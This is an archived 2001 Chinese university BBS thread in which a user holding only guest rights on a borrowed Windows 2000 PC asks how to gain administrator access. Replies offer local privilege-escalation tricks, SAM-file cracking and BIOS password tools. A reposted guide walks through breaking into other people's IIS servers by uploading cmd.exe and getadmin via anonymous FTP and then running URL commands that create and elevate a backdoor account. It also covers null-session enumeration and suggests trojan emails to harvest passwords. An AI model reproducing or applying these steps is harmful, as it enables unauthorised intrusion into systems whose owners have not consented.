荔园在线
荔园之美,在春之萌芽,在夏之绽放,在秋之收获,在冬之沉淀
[回到开始]
[上一篇][下一篇]
发信人: sonicboy (sonicboy), 信区: Security
标 题: [合集]win2kpro知道guest怎样进administrator????
发信站: 荔园晨风BBS站 (Wed Nov 13 15:40:33 2002), 站内信件
zxy (有个傻瓜爱过你) 于Mon Jul 23 16:06:23 2001提到:
只知道guest密码不知道adminitrator密码啊~~~
lvyou (突然想起她) 于Mon Jul 23 20:22:45 2001提到:
用输入法漏洞!
michaelx (爱上了BBS) 于Mon Jul 23 20:43:36 2001提到:
我以前在清华那里看到的,试试拉:
这个问题可能是重复率最高的了,也可是来这个版学的第一课
解决方法:
1:如果你有紧急修复盘,那用他就可以恢复,如果你做了此盘后没有修改过口令,
那么口
令任然在修复盘的sam文件中。有一点要提醒你,这个文件要用expand来解。
2:用一个L0pht的工具把,http://www.L0pht.com 到这个地方自己看看吧,要不
看下面
这些老掉牙的东东吧。精华区应该有吧。
下面的文章来自http://bbs.imu.edu.cn/cgi-bin/slxtit?Hacker/D157
你也可以自己去看。多找找。
如果你有普通用户帐号,有个一个很简单的方法获取NT Administrator帐号:
先把c:\winnt\system32下的logon.scr改名为logon.old备份
然后把usrmgr.exe改名为logon.scr
然后重新启动
logon.scr是启动时加载的程序,重新启动后,不会出现以往的登陆密码输入界面,而
是用户
管
理器
这时他就有权限把自己加到Administrator组
不要忘记把文件名改回来啊!
之二:
下面的技术适用于不重视NT网络安全的网站,
一些 http的技术也可以供较高级的人员参考
进入NT网络可以采取下面的步骤:
因为NT的IIS server的ftp一般都是允许anonymous匿名帐号进入的,有些
anonymous的帐号
还
有upload权限,我们就要攻击这类站点。因为如果不允许匿名帐号,就可能造成明文
密码在
网
上传输。用tcpspy的工具可以截获这些密码。现在不谈这些比较高级的技术。
正因为允许匿名帐号ftp登陆的设定,也给我们带来了突破NT server的机会。我们
用ftp登
陆
一个NT server,比如:www.xxx.com(示例名):
ftp www.xxx.com
Connected to www.xxx.com
220 ntsvr2 Microsoft FTP Service (Version 3.0).
ntsvr2这个东西暴露了其NETbios名,那么在IIS的背景下,必然会有一个
IUSER_ntsvr2的用
户
帐号,属于Domain user组,这个帐号我们以后要用来获取Administrator的权限
User (www.xxx.com:(none)):anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: 输入 guest@ 或者guest
对于缺乏网络安全知识的管理员来说,很多人没有将guest帐号禁止,或者没有设置
密码。
那么
guest帐号就是一个可用的正确的用户帐号,虽然只属于Domain guest组
在这种情况下我们就可以进NT server的ftp了。
进去以后,看看目录列表,试试 cd /c 或wwwroot等关键目录,如果运气好,改变目录
成功,
这
时你就有了80%的把握。
现在,开始查找cgi-bin目录(或者scripts目录),进去以后,
把winnt下的cmd.execopy到cgi-bin,把getadmin和gasys.dll传上去到cgi-bin
然后输入:http://www.xxx.com/cgi-bin/getadmin.exe?IUSR_SATURN
大约十多秒后屏幕显示:
CGI Error
这时有90%的可能是:你已经把IUSER_ntsvr2升级为Administrator,也就是任何访问
该web
站的
人都是管理员
下面可以add user:
http://www.xxx.com/cgi-bin/cmd.exe?/c%20c:\winnt\system32\net.
exe%20user%20chi
na
%20news%20/add
这样就创建了一个叫china用户,密码是news,然后:
http://www.xxx.com/cgi-bin/getadmin.exe?china
或者
http://www.xxx.com/scripts/tools/getadmin.exe?china
你再用china的帐号登陆,就可以有最大的权限了,也可以用上面的cmd.exe的方法直
接修改
如
果没有cmd.exe,也可以自己传一个上去到scripts/tools或者cgi-bin目录
之三:
用NT的Netbios技术扫描
nbtstat -a http://www.xxx.com/
或者
nbtstat -A http://www.xxx.com/
这样可以得到其域的共享资源名称
net view file://www.xxx.com/
可以获得其机器的共享资源名称,如果有c盘
net use f: file://www.xxx.com/c
可以用f:映射其c盘
net use \\111.111.111.111\ipc$ "" /user:""
之四: Unix下移植过来的工具:
Windows95&98的用户可以用这个tcp/ip工具去抓tcp/ip连接中的包:
WinDump95.exe 使用前还要下载这个库 Packet95.exe
WindowsNT用户的版本
WinDump.exe PacketNT.exe
1.NTFSDOS.EXE -
DOS/Windows上的网络文件系统重定向工具,它具有识别和安装NTFS驱动器,
并且进
行
透明存取的能力。这个简单易用的工具通过从DOS软盘引导,它可以绕过所有NT上
的安全
审计
机制,对基于Intel的系统上本地NTFS格式化的硬盘进行存取操作,甚至包括压缩
硬盘,
而不
需要任何身份验证。它需要在物理上能够访问目标机器。http://www.
ntinternals.com/n
tf
s13.htm.
2.NTRECOVER -
在两个NT工作站之间提供一条串行链接。用基本的NT命令和工具来抢救“坏
死”的
NT驱
动器上的数据。你甚至可以对“坏死”系统上的驱动器运行CHKDSK操作。
http://www.ntint
ernals.com.
3.NTLOCKSMITH -
绕过Administrator口令,直接进入NT系统。NTLocksmith实际上是
NTRecover的附件
程
序,对于某些忘记或者丢失Administrator口令的系统,它可以修改口令。进入系
统只需
要几
分钟请合法使用软件。http://www.ntinternals.com.
4.NTCrack - 离线式Windows
NT口令crack程序。前提是:这些口令必须是用Jeremy
Allison的PWDump请合法使用软件抓取到的。http://www.somar.
com/ntcrack.htm.
5.PWDump Utility Tool/Hack - 这是一个很有用的工具。它可以把用户从
Windows
NT上迁移到UNIX系统上,也可以使一个远程用户来破译NT加密信息,
包括用户口令的全部Registry,并把它们显示成平文。你必须登录到NT系统
,并绕
过管
理员权限设置收集到这些口令。可能的话,发一封Email给该系统上的用户,在
Email中内
嵌
Trojan
Horse特洛伊木马。ftp://samba.anu.edu.au/pub/samba/pwdump.
6.The Password Cracker - 扫描Windows
NT口令的工具,对Administrator很有用,它请合法使用软件助于验证NT域用
户口令
户口令
的
强度。http://www.omna.com/yes/andybaron/nt-passwd.htm.
以上方法的组合应该够用了。当然现在还有其他的一些工具可以使用。
zxy (有个傻瓜爱过你) 于Mon Jul 23 23:22:10 2001提到:
我台机装了sp2,这个漏洞已经没有了~~~~
zxy (有个傻瓜爱过你) 于Mon Jul 23 23:35:12 2001提到:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~`
guest用户看不到usrmgr.exe么?我怎么找不到?????
jjksam (I want to believe...) 于Tue Jul 24 00:21:20 2001提到:
用win98啓動盤啓動看看!
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~`
guest用户看不到usrmgr.exe么?我怎么找不到?????
zxy (好在还有爱情) 于Tue Jul 24 00:30:36 2001提到:
说来话长啊~~~
我的主板拿去塞格修去了,用的别人的机~~
别人的机只给了我guest权限(win2k pro,且已装了sp2)
现在我用asp要装iis,guest用户又不给装,但现在又联系不到这台机主,
这才想到去破解,而且主板bois还是加了密的,也改不了!!
sigh~~麻烦啊~~~~
michaelx (爱上了BBS) 于Tue Jul 24 00:33:15 2001提到:
放电,或者用软件读出bios的万能密码出来
zxy (好在还有爱情) 于Tue Jul 24 00:37:22 2001提到:
放电也只是解决主板bios密码~~
怎样不用动他主板信息破解出administrator?
或者你介绍个读出bios密码的软件?
thx~~
jjksam (I want to believe...) 于Tue Jul 24 00:40:22 2001提到:
那你要先说清楚那是什么型号的bios
放电也只是解决主板bios密码~~
怎样不用动他主板信息破解出administrator?
或者你介绍个读出bios密码的软件?
thx~~
zxy (好在还有爱情) 于Tue Jul 24 00:41:50 2001提到:
这个我还不会看~~教我先?
michaelx (爱上了BBS) 于Tue Jul 24 00:42:16 2001提到:
主板跟administrator没有任何关系,破了bios不等于破了aministrator
http://sd.onlinedown.net/CMOSmima.htm 试试这个
jjksam (I want to believe...) 于Tue Jul 24 00:47:18 2001提到:
在启动时按pause将启动信息停住,或者在CMOS设置里也可以看到的,一般都是
AWARD的 或者是 AMI 的
这个我还不会看~~教我先?
zxy (好在还有爱情) 于Tue Jul 24 00:52:19 2001提到:
THX~~~
~~~~~~~~~~~~~~~
是啊,那主板放电还是解决不了问题啊~~~
zxy (好在还有爱情) 于Tue Jul 24 00:53:59 2001提到:
我看看先~~thx~~
michaelx (爱上了BBS) 于Tue Jul 24 00:58:55 2001提到:
上面的方法都试过了吗
zxy (好在还有爱情) 于Tue Jul 24 01:03:03 2001提到:
输入法漏洞肯定不行了
还有一个改logon.scr和usrmgr.exe的
我只在system32下找到logon.scr但找不到usrmgr.exe
再其他方法好象没有适合我的,因为这是我朋友的机,我也不敢动大手脚~~~
michaelx (爱上了BBS) 于Tue Jul 24 01:06:59 2001提到:
把那个sam文件copy出来,用软件解。
zxy (好在还有爱情) 于Tue Jul 24 01:12:17 2001提到:
我下了那个华军cmos,但运行后看不到结果
我用cmd运行也看不到
还有,那个sam文件在哪儿的?有没有破解它的软件?thx~~~
jjksam (I want to believe...) 于Tue Jul 24 01:19:21 2001提到:
c:\winnt\repair
我下了那个华军cmos,但运行后看不到结果
我用cmd运行也看不到
还有,那个sam文件在哪儿的?有没有破解它的软件?thx~~~
zxy (好在还有爱情) 于Tue Jul 24 01:22:41 2001提到:
不是,你看看能否看到,我guest下根本就没有~~
DNA (天佑) 于Tue Jul 24 10:07:56 2001提到:
在DOS下看不见这两个文件吗?
zxy (好在还有爱情) 于Tue Jul 24 10:55:08 2001提到:
进去dos就不用破解bios了,傻的
DNA (天佑) 于Tue Jul 24 12:29:51 2001提到:
?
靠,你不会debug。
zxy (好在还有爱情) 于Tue Jul 24 13:06:26 2001提到:
装了sp2还有什么bug?
michaelx (爱上了BBS) 于Tue Jul 24 13:12:35 2001提到:
debug.com那个不是bug
用来调试用的,也可以执行汇编的命令
zxy (好在还有爱情) 于Tue Jul 24 13:15:55 2001提到:
这个还真的不懂的说~~~
本来找了个破解*PWL的软件,但guest下根本不给我装,ft咯~~~
michaelx (爱上了BBS) 于Tue Jul 24 13:17:50 2001提到:
pwl在win98,winme才有
win2k,NT都是用sam的
zxy (好在还有爱情) 于Tue Jul 24 13:24:04 2001提到:
我台机上找到ADMINIST.PWL和WONKEY.PWL
是他以前装98升级剩下的文件?
michaelx (爱上了BBS) 于Tue Jul 24 13:30:23 2001提到:
我个win2k server无*。pwl的文件
jjksam (I want to believe...) 于Tue Jul 24 13:58:53 2001提到:
win2k pro也没有
我个win2k server无*。pwl的文件
zxy (好在还有爱情) 于Tue Jul 24 14:02:00 2001提到:
看来只有找破解sam的软件咯~~~
abcrock (石头) 于Wed Jul 25 21:33:51 2001)提到:
boguce (博格斯) 于Thu Jul 26 13:09:18 2001提到:
我这里有软件,要的话就send给你
看来只有找破解sam的软件咯~~~
[回到开始]
[上一篇][下一篇]
荔园在线首页 友情链接:深圳大学 深大招生 荔园晨风BBS S-Term软件 网络书店